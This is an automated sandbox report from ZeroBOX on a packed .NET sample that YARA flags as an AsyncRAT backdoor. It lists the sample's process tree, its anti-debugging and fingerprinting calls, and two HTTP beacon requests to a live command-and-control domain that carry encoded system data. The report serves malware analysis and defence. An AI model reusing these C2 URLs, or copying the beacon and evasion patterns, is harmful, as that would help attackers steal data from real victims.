Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Aug. 19, 2021, 9:40 a.m.	Aug. 19, 2021, 10:35 a.m.

Size	1.4MB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`080dea74b4e8c480a3dc1be07c13eeeb`
SHA256	`f28cc0f1f1a0408490a39ab982477aa19dc7b199c599e9f9a89e62f2f423a24d`
CRC32	`9B74E369`
ssdeep	`24576:wUesxbPoSf/0W4vVo6m+p2EFV0/hkAGmo+M5AMGlVrfelPMEeA6yy+4:pJ0W4vANaPmbM9wFeplZ7F`
Yara	PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware OS_Processor_Check_Zero - OS Processor Check Is_DotNET_EXE - (no description) UPX_Zero - UPX packed file IsPE32 - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT Malicious_Packer_Zero - Malicious Packer

CrtCommonwinbroker.exe "C:\Users\test22\AppData\Local\Temp\CrtCommonwinbroker.exe"
2548
- cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\iU1rFtZLOF.bat"
  2316
  - chcp.com chcp 65001
    1904
  - w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
    424
  - SearchIndexer.exe "C:\Windows\System32\rasmans\SearchIndexer.exe"
    2452

Name	Response	Post-Analysis Lookup
account-shop.pp.ru	A 94.23.146.204	94.23.146.204

IP Address	Status	Action
164.124.101.2	Active	Moloch
94.23.146.204	Active	Moloch
75.2.37.224	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (19 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 19, 2021, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 19, 2021, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 19, 2021, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 19, 2021, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 19, 2021, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 19, 2021, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 19, 2021, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 19, 2021, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 19, 2021, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 19, 2021, 9:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 19, 2021, 9:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 19, 2021, 9:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 19, 2021, 9:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 19, 2021, 9:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 19, 2021, 9:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 19, 2021, 9:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 19, 2021, 9:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 19, 2021, 9:34 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 19, 2021, 9:34 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 19, 2021, 9:33 a.m.			0	0
IsDebuggerPresent Aug. 19, 2021, 9:33 a.m.			0	0
IsDebuggerPresent Aug. 19, 2021, 9:34 a.m.			0	0
IsDebuggerPresent Aug. 19, 2021, 9:34 a.m.			0	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Aug. 19, 2021, 9:34 a.m.	buffer: The batch file cannot be found. console_handle: 0x000000000000000b	1	1	0
WriteConsoleW Aug. 19, 2021, 9:34 a.m.	buffer: Active code page: 65001 console_handle: 0x0000000000000013	1	1	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 19, 2021, 9:33 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.sdata

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Aug. 19, 2021, 9:34 a.m.	stacktrace: 0x7fe9155621a 0x7fe91555ffb 0x7fe91555f31 0x7fe91498194 mscorlib+0x4ef8a5 @ 0x7feefa3f8a5 mscorlib+0x4ef609 @ 0x7feefa3f609 mscorlib+0x4ef5c7 @ 0x7feefa3f5c7 mscorlib+0x502d21 @ 0x7feefa52d21 CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef0b1f713 CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef0b1f242 CoUninitializeEE+0x4c167 GetMetaDataInternalInterface-0x2b5b5 clr+0x4f30b @ 0x7fef0b1f30b NGenCreateNGenWorker+0x682d _AxlPublicKeyBlobToPublicKeyToken-0x409df clr+0x216291 @ 0x7fef0ce6291 DestroyAssemblyConfigCookie+0x157fc PreBindAssembly-0xc054 clr+0xf6d80 @ 0x7fef0bc6d80 DestroyAssemblyConfigCookie+0x1578a PreBindAssembly-0xc0c6 clr+0xf6d0e @ 0x7fef0bc6d0e DestroyAssemblyConfigCookie+0x15701 PreBindAssembly-0xc14f clr+0xf6c85 @ 0x7fef0bc6c85 DestroyAssemblyConfigCookie+0x15837 PreBindAssembly-0xc019 clr+0xf6dbb @ 0x7fef0bc6dbb NGenCreateNGenWorker+0x6711 _AxlPublicKeyBlobToPublicKeyToken-0x40afb clr+0x216175 @ 0x7fef0ce6175 StrongNameSignatureVerification+0x5a22 GetCLRFunction-0x7712 clr+0x1866ae @ 0x7fef0c566ae BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7721652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7792c521 exception.instruction_r: 80 38 00 48 8b 4c 24 40 48 8b 54 24 48 e8 94 09 exception.instruction: cmp byte ptr [rax], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fe9155621a registers.r14: 0 registers.r15: 0 registers.rcx: 0 registers.rsi: 0 registers.r10: 8789941300256 registers.rbx: 0 registers.rsp: 484637856 registers.r11: 484632176 registers.r8: 45727684 registers.r9: 45727668 registers.rdx: 45727656 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Aug. 19, 2021, 9:34 a.m.

stacktrace:

0x7fe9155621a
0x7fe91555ffb
0x7fe91555f31
0x7fe91498194
mscorlib+0x4ef8a5 @ 0x7feefa3f8a5
mscorlib+0x4ef609 @ 0x7feefa3f609
mscorlib+0x4ef5c7 @ 0x7feefa3f5c7
mscorlib+0x502d21 @ 0x7feefa52d21
CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef0b1f713
CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef0b1f242
CoUninitializeEE+0x4c167 GetMetaDataInternalInterface-0x2b5b5 clr+0x4f30b @ 0x7fef0b1f30b
NGenCreateNGenWorker+0x682d _AxlPublicKeyBlobToPublicKeyToken-0x409df clr+0x216291 @ 0x7fef0ce6291
DestroyAssemblyConfigCookie+0x157fc PreBindAssembly-0xc054 clr+0xf6d80 @ 0x7fef0bc6d80
DestroyAssemblyConfigCookie+0x1578a PreBindAssembly-0xc0c6 clr+0xf6d0e @ 0x7fef0bc6d0e
DestroyAssemblyConfigCookie+0x15701 PreBindAssembly-0xc14f clr+0xf6c85 @ 0x7fef0bc6c85
DestroyAssemblyConfigCookie+0x15837 PreBindAssembly-0xc019 clr+0xf6dbb @ 0x7fef0bc6dbb
NGenCreateNGenWorker+0x6711 _AxlPublicKeyBlobToPublicKeyToken-0x40afb clr+0x216175 @ 0x7fef0ce6175
StrongNameSignatureVerification+0x5a22 GetCLRFunction-0x7712 clr+0x1866ae @ 0x7fef0c566ae
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7721652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7792c521

exception.instruction_r: 80 38 00 48 8b 4c 24 40 48 8b 54 24 48 e8 94 09
exception.instruction: cmp byte ptr [rax], 0
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fe9155621a
registers.r14: 0
registers.r15: 0
registers.rcx: 0
registers.rsi: 0
registers.r10: 8789941300256
registers.rbx: 0
registers.rsp: 484637856
registers.r11: 484632176
registers.r8: 45727684
registers.r9: 45727668
registers.rdx: 45727656
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 0
registers.r13: 0

Performs some HTTP requests (2 events)

request

GET http://account-shop.pp.ru/KL0ND1K3.php?v8HlHCxd=trxGQz7cOd5MfqOMUJ9ww4YVzclJm&8c54382121f9bf4d734eebd68c06e5db=78dd1f8ee390015a0d526951cf4f9234&2422f6afd71ca221c47841fde7834bfb=QNjhTO4Q2NiJWMjRWO1IjYwIjM5ADNzQWMiVWNxUjNxIzMmJmY3QGO&v8HlHCxd=trxGQz7cOd5MfqOMUJ9ww4YVzclJm

request

GET http://account-shop.pp.ru/KL0ND1K3.php?v8HlHCxd=trxGQz7cOd5MfqOMUJ9ww4YVzclJm&2a3fa548e2b25f007493037ef4216a1c=QYlRjM3UmZlZTMmdTMhJTM5IjY5QTZzEmZhFzYhFWNjlTZ0YzYhZWZ0cjMzATM4MzMxQDM3cTM&2422f6afd71ca221c47841fde7834bfb=gZlVmYmFTOxU2N5EmMhZTZ0IDOihjY1ITY3gTO2ATOhRGOjNzY1UWN&97bad0ae15ec709213b97cf003b1de89=d1nIwQTZ0YTO1EGZjZTY2QWO0YDZzMmZ2MjYjlTYzI2NhZzNldDO1IWYlJiOigTMmRzYhJGNyUWZ4kzNjZGZ4MDO3EmM5QmN5gzN4ITOiwiI1AjZ1IzN0UDM3UWZ1gzY0IzY0UGM3IjZwYzMmVjZjRjZyE2NkhjM3IiOicDZhhDZiRTNkRzY2IzYyUGOhBzMiZ2MykzN3EGZ4QWNis3W&8484aff792e729c4157ee527a52b4ca6=0VfiIiOiMDNhVTYjFDOkhTNwgjZzY2Y4Y2Y5EGZmVjZkR2MzczNiwiIwQTZ0YTO1EGZjZTY2QWO0YDZzMmZ2MjYjlTYzI2NhZzNldDO1IWYlJiOigTMmRzYhJGNyUWZ4kzNjZGZ4MDO3EmM5QmN5gzN4ITOiwiI1AjZ1IzN0UDM3UWZ1gzY0IzY0UGM3IjZwYzMmVjZjRjZyE2NkhjM3IiOicDZhhDZiRTNkRzY2IzYyUGOhBzMiZ2MykzN3EGZ4QWNisHL9JSOKl2YsR2VZVnRXR1ZwcVW5RmMilnQslkNJlHZ2JVbiBHZGZFRGtWSzl0UXl2bqlUdsdlYrZEMjBnSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSpNGbOhlVzYVbUl2bqlESGVkVpdXaJBDbtF1ZRpmTnRDMTd2dXlVd5cVY65EWa1WOtNWUClnTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJhmVtNmd0VUSvJFWkZnTGlEdBNkWsxWbaBnTXp1dOhUSwkTbUl2bqlkbKNjYpdXaJVzZU1Ee0knT5VERMlXRE1UM0knT6lUaPlWTyI2cKNETplUMTl2bqlUNKhEZ1Z1MipmSDxUa3dFZ2ZlMVl2bqlUd5cVYuZVbjl2dplUMkdFToJ0MaVXOyUVavpWS1IFWhpmSDxUaBRlT4RzQOpXRqxENBpWT1VleOhXSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWSq1EMOhlWwoUaPlWVXJGa1s2Ys5EWWl2dplERCZFT5lERWRlVFZVavpWSsFzVZ9kTFVVa3lWS4RzQOVXUqlkNJl2YspFbjxmWuNGbOxWSzlUallEZF1EN0kWTnFURJZlQxE1ZBRUTwcGVMFzaHlEcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSDJ0QNdGMDl0dTl1NSlHN2ATYKdzZwwEb0pGcuJna3QXcENVUIplRJF0ULdzYHp1Np9maJxWMXl1TWZUVIp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMDNhVTYjFDOkhTNwgjZzY2Y4Y2Y5EGZmVjZkR2MzczNiwiIkVjZmVjY0UzMhFDOjljY2cTOmFmZ5EjMhZTN3MzMjhDMzADZxUzYiJiOigTMmRzYhJGNyUWZ4kzNjZGZ4MDO3EmM5QmN5gzN4ITOiwiI1AjZ1IzN0UDM3UWZ1gzY0IzY0UGM3IjZwYzMmVjZjRjZyE2NkhjM3IiOicDZhhDZiRTNkRzY2IzYyUGOhBzMiZ2MykzN3EGZ4QWNis3W

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

account-shop.pp.ru

description

Russian Federation domain TLD

Allocates read-write-execute memory (usually to unpack itself) (50 out of 196 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 2031616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000610000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000780000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1431000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1acb000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 720896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000670000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000006a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1432000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1432000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1432000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1432000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1432000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1432000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1432000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1432000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1432000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1432000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1432000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1434000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1434000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1434000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1434000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c7a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c8c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91db0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91d2c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91d56000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91d30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c7b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c9b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91ccc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c9d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 36864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91db1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c72000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c7c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c8d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91dba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91dbb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91dbc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c8e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91dbd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c8a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91dbe000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91dbf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 19, 2021, 9:33 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91dc1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

